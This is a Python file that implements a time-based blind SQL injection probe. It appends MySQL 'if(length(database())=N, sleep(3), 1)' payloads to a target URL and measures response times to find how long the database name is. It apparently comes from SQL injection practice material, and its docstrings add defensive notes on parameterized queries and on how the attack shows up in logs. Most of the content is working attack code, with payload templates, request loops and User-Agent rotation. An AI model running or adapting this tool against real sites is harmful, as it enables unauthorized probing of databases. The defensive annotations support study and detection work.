# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:19
@Auth : zhangxiang
@File :GetLength_Inject.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
#获取数据库名长度
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
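class GetLength_Inject(object):
    """Time-based blind SQL injection probe for the current database name length.

    Both public methods append a condition of the form
    ``and if((length((select database()))=N),sleep(3),1)`` to ``url`` for
    N = 1..31 and treat a response slower than 3 seconds as "length is N".
    ``if``, ``sleep`` and ``database()`` are MySQL-style functions.

    Reviewer notes (defensive view):
      * The probe only yields information when the server concatenates the
        request parameter into a SQL statement; binding the parameter through
        a prepared/parameterized query removes the injection point.
      * In access logs a run appears as up to 31 sequential GET requests whose
        query string contains ``sleep(`` and ``length((select%20database()))``,
        one of them answered roughly 3 seconds later than the rest.
      * The elapsed time includes ordinary network and server latency, so a
        slow response is indistinguishable from a triggered ``sleep``.
    """

    # Condition template; "changeNum" is replaced by the candidate length.
    _JUDGE_TEMPLATE = "%20and%20if((length((select%20database()))=changeNum),sleep(3),1)"
    # 0x5375626D6974 is the hex encoding of the ASCII string "Submit".
    _SUBMIT_PARAM = "&submit=0x5375626D6974"
    # URL-encoded "#", which starts a comment in MySQL.
    _COMMENT = "%23"

    def __init__(self):
        pass

    def _timed_get(self, full_url, headers):
        """Send one GET request and return the seconds until urlopen() returned."""
        startTime = time.time()
        req = request.Request(url=full_url, headers=headers)
        # The original never closed the response object; the context manager
        # releases the connection once the timestamp has been taken.
        with request.urlopen(req):
            endTime = time.time()
        return endTime - startTime

    def _report(self, num, full_url, allTime):
        """Print the banner announcing the detected length, payload and timing."""
        print("*"*200)
        print("得到盲注结果,数据库的长度为:"+str(num))
        print("注入的payload:"+full_url)
        print("使用的时间:"+str(allTime))
        print("*"*200)

    def Str_Start(self, StrList, url):
        """Probe a string-type parameter for the database name length.

        The condition and the ``submit`` parameter are each followed by
        ``%23`` so the remainder of the original statement is commented out.
        The payload adds no quote itself; presumably ``url`` already ends with
        the character that closes the string literal -- confirm with the caller.

        Args:
            StrList: Accepted for interface compatibility; not used.
            url: Target URL up to and including the injectable parameter value.

        Returns:
            The first candidate length (1..31) whose response took more than
            3 seconds, or None when no candidate did.

        Raises:
            urllib.error.URLError: Propagated from ``urlopen`` (HTTPError for
                4xx/5xx answers).
        """
        for num in range(1, 32):
            FisWord = (self._JUDGE_TEMPLATE + self._COMMENT).replace("changeNum", str(num))
            full_url = url + FisWord + self._SUBMIT_PARAM + self._COMMENT
            print(full_url)
            # ua_list comes from the project-local ua_info module.
            headers = {'User-Agent': random.choice(ua_list)}
            allTime = self._timed_get(full_url, headers)
            if allTime > 3:
                self._report(num, full_url, allTime)
                return num

    def Num_Start(self, StrList, url):
        """Probe a numeric-type parameter for the database name length.

        Same loop as ``Str_Start`` but without the trailing ``%23`` comment
        markers, with a fixed User-Agent, and without echoing every URL.

        Args:
            StrList: Accepted for interface compatibility; not used.
            url: Target URL up to and including the injectable parameter value.

        Returns:
            The first candidate length (1..31) whose response took more than
            3 seconds, or None when no candidate did.

        Raises:
            urllib.error.URLError: Propagated from ``urlopen`` (HTTPError for
                4xx/5xx answers).
        """
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'}
        for num in range(1, 32):
            FisWord = self._JUDGE_TEMPLATE.replace("changeNum", str(num))
            full_url = url + FisWord + self._SUBMIT_PARAM
            allTime = self._timed_get(full_url, headers)
            if allTime > 3:
                self._report(num, full_url, allTime)
                return num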
SQL注入代码实践(盲注-获取数据库名长度【数值型】)